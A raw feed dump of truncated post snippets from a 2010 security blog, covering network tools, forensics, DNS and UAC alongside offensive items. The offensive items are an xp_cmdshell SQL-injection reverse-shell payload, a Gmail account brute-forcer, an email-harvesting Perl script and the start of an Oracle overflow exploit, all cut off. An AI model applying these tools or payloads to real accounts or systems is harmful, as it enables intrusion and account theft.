c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-26549441892138634262010-10-03T05:45:00.002+08:002010-10-03T05:56:10.940+08:00

FREE: Win IP Config – GUI replaces ipconfig, route, and netstatping command is the main reason why I still use the command prompt regularly. Well, that is not really true. Another command, I use frequently, is ipconfig. I usually need it whenever I have connection problems. It is the fastest way to get an overview of a PC’s network configuration. When I had to use it again recently, I thought it

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-21080677460764858072010-09-21T15:52:00.003+08:002010-09-21T15:54:06.298+08:00

idsecconf 2010 Bali -- Call of paper Kami dari komite idsecconf 2010 Bali memberi kesempatan pada rekan-rekanpenggiat keamanan komputer di seluruh Indonesia untuk berpartisipasilewat penyerahan paper. Topik utama yang kami cari adalah yang berkaitandengan:"Keamanan dalam bertransaksi electronic banking dan electronic payment" Secara explisit, ini mencakup (namun tidak terbatas) pada:- pengamanan

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-1239929922192310462010-09-21T15:48:00.001+08:002011-06-21T23:32:45.687+08:00

RIPS version 0.33 Released RIPS - A static source code analyser for vulnerabilties in PHP scripts  Especially the code viewer has been improved (variable highlighting,drag+dropable,resizeable window,active jumping between function calls and declarations) and is not only good for analyzing vulnerabilities manually but also for understanding foreign code quickly.also a lot of new features like

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-8279446725894757682010-08-15T20:45:00.002+08:002011-06-20T00:27:53.547+08:00

The Honeynet project released a memory forensics challenge a few months ago. I read over the winning three submissions and was very impressed with the creative solutions they came up with. The submitters used freeware tools and clearly spent a significant amount of time putting their answers together. These sort of academic challenges are fun and a great way to hone your skills. In a

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-40141320500415269632010-08-15T19:47:00.001+08:002010-08-15T19:52:34.793+08:00

Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just wont stay down. If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-3771973800335758822010-08-13T03:29:00.001+08:002011-06-21T00:56:03.196+08:00

This is me, editorializing - not an activity I prefer to use this blog for. But occasionally something seems so nonsensical to me that I just have to speak up. And today it's UAC that has me speaking up. I'm greatly disappointed by the number of true techies and semi-techies who have gone into a sort of 'hate UAC' mode. I understand their frustrations; UAC can slow down routine sysadmin

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-11407314725583764722010-08-13T03:21:00.003+08:002010-08-13T03:22:06.997+08:00

This one is a little bit esoteric. Scenario: You try to connect to somesystem.yourdomain.com and fail - the name cannot be looked up. You discover that the DNS record is missing in your DNS server, and you fix it by adding the correct record. ... but you still can't connect to somesystem.yourdomain.com from your workstation! What's happening here is that your system has cached a 'negative

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-45439117970974874442010-08-12T15:28:00.002+08:002011-06-21T00:54:10.051+08:00

In regards to the previous post and the impending Blackhat speech with Josh Sokol, I thought I’d spend some time enumerating some of the possibilities for reducing the chatter over SSL/TLS that the browser introduces. There are a few things that an attacker generally doesn’t care about (not always, but generally). They generally don’t care about images, CSS, JavaScript, favicons, and most

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-30757386299676647322010-08-12T15:26:00.002+08:002011-06-21T00:54:38.747+08:00

For those of you who may not have seen it there is a very good paper partially by Microsoft Research and partially by Indiana.edu called Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow. Initially it really upset me off that this paper was written, not because it’s not excellent, but because it’s partially what I was going to be speaking about at Blackhat.

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-19243792721530487992010-08-11T17:19:00.000+08:002010-08-11T17:19:45.943+08:00

Contents Introduction Vista & Session Separation About NtCreateThreadEx Function Executing Remote Thread into System Process using NtCreateThreadEx. Limitations of NtCreateThreadEx Method Alternative Techniques Conclusion References IntroductionWindows provides API function called, CreateRemoteThread [Reference 2] which allows any process to execute thread in the

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-61882626756565649102010-06-22T22:10:00.002+08:002011-06-21T22:50:54.966+08:00

Originally written by RSnake with input from id, Vacuum and Robert E Lee. A special thanks to IceShaman to porting it to use multi-threading and to Jabra for several patches and porting it into Backtrack 3.0. A huge thanks to Jabra for taking this to the next level with 2.x! Fierce domain scan was born out of personal frustration after performing a web application security audit. It is

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-20649275856724653312010-06-22T21:43:00.000+08:002010-06-22T21:43:35.066+08:00

With Blackhat impending, and given how many individual issues I’ll be discussing, I thought I should start posting them here. That and the fact that I’m quickly approaching my 1000′th post (which, if I have my way will be my last on ha.ckers.org) means that I need to start wrapping up these issues into a neat little bow. I have 43 more, as of this post, so the clock is ticking.

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-109458273114601662010-06-22T21:36:00.000+08:002010-06-22T21:36:57.167+08:00

  Introduction Htaccess can be used to manage multiple usernames/passwords, thereby enhancing information protection on the web server by controlling access through HTTP protocols. When used in conjunction with a browser encryption method such as SSL, it is possible to make htaccess authentication a robust method of protecting directories. However, out of the box, htaccess is prone to several

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-12055988162067970422010-06-08T00:43:00.003+08:002010-06-08T16:58:26.991+08:00

ONE CLICK OWNAGEhttp://english.mavituna.com Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload. For example the following text will throw a reverse shell to 192.168.0.1:1;exec master..xp_cmdshell 'echo try download link down for complate Similar attacks have been around

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-74050355072282563912010-05-30T08:31:00.000+08:002010-05-30T08:31:57.716+08:00

There's a new search called SHODAN, which can look for servers, routers and printers using your search query, and get their response banners. This is what you can search for:     * country:2-letter country code     * hostname:full or partial host name     * net:IP range using CIDR notation (ex: 18.7.7.0/24 )     * port:21, 22, 23 or 80 As you can see, anyone can easily find vulnerable hosts

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-89238742921376244122010-05-25T09:12:00.001+08:002010-05-25T09:14:27.296+08:00

Covers wep & wpa password/passphrase recovery using the aircrack-ng suite http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks 

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-36528804621338380772010-05-24T05:52:00.000+08:002010-05-24T05:52:01.694+08:00

Managed byipsecs.comYou may download all ipv6 hackit oncore.ipsecs.com or tarball version onipv6hackit-v0.1.tar.gz  

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-5628347824669436402010-05-10T09:21:00.008+08:002011-06-21T00:53:03.927+08:00

  Yes... simple, smart n powerfull... ;) not just push button hacker....PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools (DoS and DDoS), Secure Password Generators, Honeypots and much more. Destined to test security/stability of networks and more. Programmed in Ruby, and oriented to GNU/Linux systems (but compatible with Windows, MacOS and more).

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-43155132631689920672010-05-08T18:02:00.005+08:002010-05-08T18:22:31.951+08:00

Vulnerability   "The Finger Server" Affected "The Finger Server" Description Iain  Wade  found  following.   In  1999.  he was tinkering w/ The Finger  Server  v0.82  and  came  across  some  bugs which let you execute shell  commands under  the privileges  of the  web server.It's available at glazed.org  It's just another case of perl doing it's magic on an open() call.There  is  undoubtably 

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-29953214712119515272010-05-07T06:22:00.001+08:002010-05-07T06:24:03.097+08:00

#!/usr/bin/perl # emailzz.pl by TheLeader # Searches google and gathers e-mail adresses from search results # Credit to Sro for the idea and the inspiration.. keep it up dude ^^ # http://forums.hacking.org.il/viewtopic.php?p=49414#49414 # When patterns are broken, new worlds emerge ~Tuli Kupferberg # DISCALIMER: # Using this script may violate Google's Terms of Service. # I take no

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-60044373111784172902010-05-05T04:41:00.004+08:002010-05-05T04:51:14.409+08:00

 This was several days I tried a source for penetration, and I think I can just incredible to thank my wisdom from evilzc0de>black hat Indonesia>jasakom.I just think this compilation has the structure of the algorithm and extraordinary at the time of inspection.we are all grateful for mywisdom open enough to share .hopefully continue to be developed!-----------------------------------------------

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-42708057758502372832010-05-03T10:10:00.001+08:002010-05-04T17:14:08.951+08:00

This entry goes along with HowTo: Windows XP VPN Server Setup. Having a Secured VPN (Virtual Private Networking) server is great, especially for businesses with many offices or if you own two homes. How can you connect to these VPNs free? Well I will tell you. With Windows XP Networking you can connect to any VPN site for free and with ease. There is even a way to Automate the VPN connection on

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-89321702436340286592010-05-02T23:56:00.001+08:002010-05-02T23:58:13.390+08:00

  Disclaimer:This program is intended for educational purposes only. Please use on your OWN e-mail. The author of this program is not responsible for whatever possible trouble you get into. Use at own risk! Intro: Brutemonkey is a Gmail Account bruteforcer/dictionary attack application. It will successfully crack any Gmail account. The bruteforce option may take longer than the dictionary method

c0decstuffnoreply@blogger.com1tag:blogger.com,1999:blog-7832887832011382499.post-53594927295015108212010-05-02T13:24:00.001+08:002011-06-20T01:22:51.740+08:00

2006 wasc(web application security consurtium)releaseWeb Application Firewall Evaluation Criteria  for detailed criteria of the desired web application firewall. Web application firewall implementation service(appliance, plugins, set of HTTP rules)created specifically to address the various types of attacks on web security,web application firewall specifically to cope with various kinds of

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-50506678243802709872010-04-30T02:40:00.002+08:002010-04-30T02:47:30.730+08:00

 Subject : kecoak-elektronik.net,ipsecs.comSubject : Exploiting Future Internet - Defeating IPv6 Writer : Ph03n1X (return?) Contact : staff@kecoak-elektronik.netlanguage ver : IndonesiaTOKET - Terbitan Online Kecoak Elektronik Defending the classical hackers mind since 1995  IPv6 merupakan protokol internet masa depan yang dikenalkan oleh IETF sejak tahun 1998. Standar

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-56251145292594883352010-03-22T07:17:00.002+08:002011-06-21T22:52:10.989+08:00

[+] vulnerabilities network level/stack based buffer overflow [+] special network layer attack [+] implemented over http/XML-db/ftp==>windows XDB [+] connecting:8080 [=] operation: win 32-->xdb overflow [+] author mc2_s3lector [+] yogyacarderlink.web.id/KeDai Computerworks.com exploit win32 #include #include #include int GainControlOfOracle(char *, char *); int StartWinsock(void); int

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-45467158764912299732010-03-10T16:41:00.001+08:002010-03-10T16:41:00.378+08:00

Here at the X-Force, we catch our fair share of malware from random spammers and phishers just as any corporate or home user does. Today we dive into one of these attacks to show how it works and what these guys are after. This poorly crafted email phising attack was sent to us courtesy of: Received: from XXX.cpe.vivax.com.br ([189.55.XXX.XXX]) It contained a simple link to a website hosting

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-30520365863088395552010-03-10T16:09:00.003+08:002011-06-21T00:48:35.553+08:00

Spammers and scammers are no longer content with exploiting real news events for their personal gain - they're now creating their own news to earn money through affiliate programs using blackhat SEO techniques.Blackhat SEO is when spammers and scammers use various dirty tricks to get links to their pages to show up near the top of search results on search engines. It's been a problem for a

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-70172868289203366772010-02-17T13:58:00.003+08:002011-06-20T01:30:52.606+08:00

Along these growing years in the development of Joomla,Joomla has came over to be the best and most reliable Content management System. But in recent news coverage we have seen that things can be exploited if you don't take the right precautions ,Joomla sites can be easily hacked by some little tweaks also. So how to prevent yourself from being hacked?? While installing Joomla, make sure you

c0decstuffnoreply@blogger.com0tag:blogger.com,1999:blog-7832887832011382499.post-62699291560088019812010-02-12T12:13:00.002+08:002010-02-12T12:15:34.111+08:00

PART ONE : THEORY & BACKGROUND I. INTRODUCTION II. MENTAL III. BASICS IV. ADVANCED V. UNDER SUSPECT VI. CAUGHT VII. PROGRAMS VIII. LAST WORDS I. INTRODUCTION

c0decstuffnoreply@blogger.com0